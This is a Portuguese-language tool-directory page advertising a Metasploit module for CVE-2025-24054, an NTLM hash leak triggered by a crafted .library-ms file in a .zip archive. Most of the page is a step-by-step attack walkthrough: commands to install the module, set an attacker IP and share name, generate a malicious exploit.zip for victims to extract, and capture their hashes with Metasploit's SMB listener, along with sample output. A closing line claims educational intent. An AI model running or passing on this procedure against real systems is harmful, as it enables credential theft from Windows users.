Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24054-24071---Metasploit-Module — Módulo do Metasploit para explorar CVE-2025-24054 (ex 24071). Exploit de vazamento NTLM integrado ao Metasploit para vetores de ataque baseados em bibliotecas do Windows. | Kitploit
Ferramentas/GitHubGitHub/securitylayer404/cve-2025-24054-24071---metasploit-module
Frameworks de ExploraçãoGeração de PayloadsExploraçãoTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubsecuritylayer404/cve-2025-24054-24071---metasploit-module

CVE-2025-24054-24071---Metasploit-Module

Módulo do Metasploit para explorar CVE-2025-24054 (ex 24071). Exploit de vazamento NTLM integrado ao Metasploit para vetores de ataque baseados em bibliotecas do Windows.

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24054/24071 - Módulo Metasploit

Visão Geral

A vulnerabilidade ocorre durante o processo de extração de um arquivo .zip. Ao interagir com um arquivo .library-ms especialmente projetado, o Explorador de Arquivos do Windows processa o esquema XML interno e inicia automaticamente uma solicitação de autenticação SMB para um caminho remoto controlado pelo atacante.

Esse comportamento permite a exfiltração do hash NTLM do usuário sem exigir interação adicional além da descompactação do arquivo. Para ver uma prova de conceito, recomendo visitar o seguinte link: Fluffy - HTB.

⚠️ Nota crítica:

Embora originalmente essa vulnerabilidade tenha sido divulgada como CVE-2025-24071, atualmente é rastreada oficialmente como CVE-2025-24054.

📌 Instalação

Clonar o repositório:

root@kitploit:~
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071

Copiar o módulo para o diretório do Metasploit:

root@kitploit:~
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

Se o diretório não existir, crie-o com:

root@kitploit:~
❯ mkdir -p ~/.msf4/modules/auxiliary/server/

Em seguida, copie o módulo novamente.

📌 Uso

Iniciar o Metasploit e carregar o módulo:

root@kitploit:~
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak

Se o módulo carregar corretamente, você verá as opções para configurá-lo:

root@kitploit:~
❯ show options

Module options (auxiliary/server/ntlm_hash_leak):

   Name          Current Setting       Required  Description

   ----          ---------------       --------  -----------

   ATTACKER_IP                         yes       IP do atacante (onde roda Responder/Impacket)

   FILENAME      exploit.zip           yes       O nome do arquivo ZIP

   LIBRARY_NAME  documents.library-ms  yes       Nome do arquivo .library-ms

   SHARE_NAME    recurso               yes       Nome do recurso compartilhado fictício

Configure o módulo e execute:

root@kitploit:~
❯ set ATTACKER_IP 0.0.0.0  # Reemplaza con tu IP atacante

❯ set FILENAME exploit.zip  # Nombre del payload que subiras al SMB (equipo objetivo)

❯ set LIBRARY_NAME malicious.library-ms  # Nombre de .library-ms file

❯ set SHARE_NAME it_shared  # Nombre del recurso SMB

❯ run

Saída: o módulo gera um arquivo .zip que deve ser enviado ao servidor SMB alvo para posterior execução pela vítima

root@kitploit:~
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed

Por último, use o módulo de captura SMB do Metasploit para receber os hashes NTLM:

root@kitploit:~
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0  # Reemplaza con tu IP atacante
❯ run

Se você tiver problemas para levantar o servidor SMB pelo Metasploit:

  • Execute o msfconsole como root
  • Certifique-se de que o arquivo ntlm_hash_leak.rb tenha as permissões adequadas para ser acessado pelo root

⚠️ Aviso

Este módulo foi desenvolvido apenas para fins educacionais e de testes autorizados. O uso não autorizado desse tipo de ferramenta pode ser ilegal.

🕷 Autor

Security Layer

Baixar ferramenta